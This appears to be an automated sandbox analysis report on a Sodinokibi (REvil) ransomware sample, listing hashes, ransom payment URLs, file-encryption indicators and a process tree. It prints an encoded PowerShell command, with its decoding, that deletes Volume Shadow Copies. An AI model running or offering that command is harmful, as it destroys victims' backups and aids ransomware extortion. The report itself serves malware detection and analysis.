Analysis
- max time kernel: 150s
- max time network: 144s
- platform: windows10_x64
- resource: win10v200722
- submitted: 25-08-2020 12:17
- Static task: static1
- Behavioral task: behavioral1 (Sample: 55.exe, Resource: win7)
- Behavioral task: behavioral2 (Sample: 55.exe, Resource: win10v200722)
General
- Target: 55.exe
- Size: 289KB
- MD5: 500286eaf9eb11b34eb413bb0df5543b
- SHA1: b889ff1138b2bd7a3033ca4c4868189dc8588f9b
- SHA256: f67d2bb9157ba5ccacbe051ac737812226fb2b43fe209867ae276695a8a929a4
- SHA512: 65ce297688900f0c7b1eb3a327771eff79e366290761613b364f463787f66a46d14127e1a644b5fb8f26befdf90ce100110cf47107b9457f971ca8056402782a
Malware Config
Extracted
- Path: C:\x16q8vngrn-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B6E9B7957F638FA
  - http://decryptor.cc/5B6E9B7957F638FA
Signatures
- Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Modifies extensions of user files (10 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: 55.exe
  description | ioc | process
  - File opened for modification | \??\c:\users\admin\pictures\EditOut.tiff | 55.exe
  - File renamed | C:\Users\Admin\Pictures\InitializeInvoke.crw => \??\c:\users\admin\pictures\InitializeInvoke.crw.x16q8vngrn | 55.exe
  - File renamed | C:\Users\Admin\Pictures\ExportEnter.raw => \??\c:\users\admin\pictures\ExportEnter.raw.x16q8vngrn | 55.exe
  - File renamed | C:\Users\Admin\Pictures\UnprotectUnregister.raw => \??\c:\users\admin\pictures\UnprotectUnregister.raw.x16q8vngrn | 55.exe
  - File opened for modification | \??\c:\users\admin\pictures\ConnectRename.tiff | 55.exe
  - File renamed | C:\Users\Admin\Pictures\ConnectRename.tiff => \??\c:\users\admin\pictures\ConnectRename.tiff.x16q8vngrn | 55.exe
  - File renamed | C:\Users\Admin\Pictures\LimitExpand.tiff => \??\c:\users\admin\pictures\LimitExpand.tiff.x16q8vngrn | 55.exe
  - File renamed | C:\Users\Admin\Pictures\SelectDeny.tif => \??\c:\users\admin\pictures\SelectDeny.tif.x16q8vngrn | 55.exe
  - File renamed | C:\Users\Admin\Pictures\EditOut.tiff => \??\c:\users\admin\pictures\EditOut.tiff.x16q8vngrn | 55.exe
  - File opened for modification | \??\c:\users\admin\pictures\LimitExpand.tiff | 55.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 5 IoCs)
  Processes: vssvc.exe
  description | ioc | process
  - Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
  - Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  - Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  - Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  - Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes: 55.exe
  description | ioc | process
  - Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dnmsg017q3za.bmp" | 55.exe
- Drops file in Program Files directory (16 IoCs)
  Processes: 55.exe
  description | ioc | process
  - File opened for modification | \??\c:\program files\RemoveUse.snd | 55.exe
  - File opened for modification | \??\c:\program files\EditRename.kix | 55.exe
  - File opened for modification | \??\c:\program files\GetResize.eps | 55.exe
  - File opened for modification | \??\c:\program files\ProtectExpand.docm | 55.exe
  - File opened for modification | \??\c:\program files\RestartClose.xml | 55.exe
  - File opened for modification | \??\c:\program files\SelectExport.pptx | 55.exe
  - File opened for modification | \??\c:\program files\SetShow.xht | 55.exe
  - File created | \??\c:\program files\x16q8vngrn-readme.txt | 55.exe
  - File opened for modification | \??\c:\program files\EnterMount.vsx | 55.exe
  - File opened for modification | \??\c:\program files\ReceiveStep.tif | 55.exe
  - File opened for modification | \??\c:\program files\DisableFormat.i64 | 55.exe
  - File opened for modification | \??\c:\program files\SaveSkip.pptx | 55.exe
  - File opened for modification | \??\c:\program files\UnpublishConvertTo.svgz | 55.exe
  - File created | \??\c:\program files (x86)\x16q8vngrn-readme.txt | 55.exe
  - File opened for modification | \??\c:\program files\ConnectRegister.html | 55.exe
  - File opened for modification | \??\c:\program files\RevokeDisconnect.midi | 55.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: firefox.exe
  description | ioc | process
  - Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: 55.exe, powershell.exe
  pid | process
  - 580 | 55.exe (2 events)
  - 852 | powershell.exe (3 events)
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: 55.exe, powershell.exe, vssvc.exe
  description | pid | process
  - Token: SeDebugPrivilege | 580 | 55.exe
  - Token: SeDebugPrivilege | 852 | powershell.exe
  - Token: SeBackupPrivilege | 2504 | vssvc.exe
  - Token: SeRestorePrivilege | 2504 | vssvc.exe
  - Token: SeAuditPrivilege | 2504 | vssvc.exe
  - Token: SeTakeOwnershipPrivilege | 580 | 55.exe
- Suspicious use of SetWindowsHookEx (1 IoCs)
  Processes: firefox.exe
  pid | process
  - 260 | firefox.exe
- Suspicious use of WriteProcessMemory (13 IoCs)
  Processes: 55.exe, firefox.exe, firefox.exe
  description | pid | process | target process
  - PID 580 wrote to memory of 852 | 580 | 55.exe | powershell.exe (2 events)
  - PID 856 wrote to memory of 260 | 856 | firefox.exe | firefox.exe (9 events)
  - PID 260 wrote to memory of 3652 | 260 | firefox.exe | firefox.exe (2 events)
Processes
- C:\Users\Admin\AppData\Local\Temp\55.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\55.exe"
  PID: 580
  - Modifies extensions of user files
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 580)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    (the -e argument is base64 of UTF-16LE text and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of Volume Shadow Copies, which accounts for the vssvc.exe activity below)
    PID: 852
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 884
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 2504
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
- C:\Program Files\Mozilla Firefox\firefox.exe
  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
  PID: 856
  - Suspicious use of WriteProcessMemory
  - C:\Program Files\Mozilla Firefox\firefox.exe (child of PID 856)
    Command line: "C:\Program Files\Mozilla Firefox\firefox.exe"
    PID: 260
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Program Files\Mozilla Firefox\firefox.exe (child of PID 260)
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="260.0.1971403473\1161750959" -parentBuildID 20200403170909 -prefsHandle 1520 -prefMapHandle 1512 -prefsLen 1 -prefMapSize 219546 -appdir "C:\Program Files\Mozilla Firefox\browser" - 260 "\\.\pipe\gecko-crash-server-pipe.260" 1612 gpu
      PID: 3652